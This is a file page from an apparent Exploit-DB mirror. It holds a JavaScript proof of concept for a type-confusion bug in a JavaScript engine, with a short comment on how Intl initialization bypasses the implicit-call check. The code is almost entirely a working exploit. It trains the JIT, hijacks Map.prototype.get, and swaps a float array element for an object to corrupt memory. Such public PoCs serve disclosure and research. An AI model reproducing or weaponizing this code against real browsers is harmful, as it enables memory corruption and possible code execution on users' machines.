exploit-db-mirror/exploits/windows/dos/45213.js
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

31 lines
No EOL
650 B
JavaScript

/*
If the Intl object hasn't been initialized, access to any property of it will trigger the initialization process which will run Intl.js. The problem is that it runs Intl.js without caring about the ImplicitCallFlags flag.
In the PoC, it redefines Map.prototype.get to intercept the execution of Intl.js.
PoC:
*/
function opt(arr, obj) {
arr[0] = 1.1;
obj.x;
arr[0] = 2.3023e-320;
}
let arr = [1.1];
for (let i = 0; i < 0x10000; i++) {
opt(arr, {});
}
let get = Map.prototype.get;
Map.prototype.get = function (key) {
Map.prototype.get = get;
arr[0] = {};
return this.get(key);
};
opt(arr, Intl);
alert(arr[0]);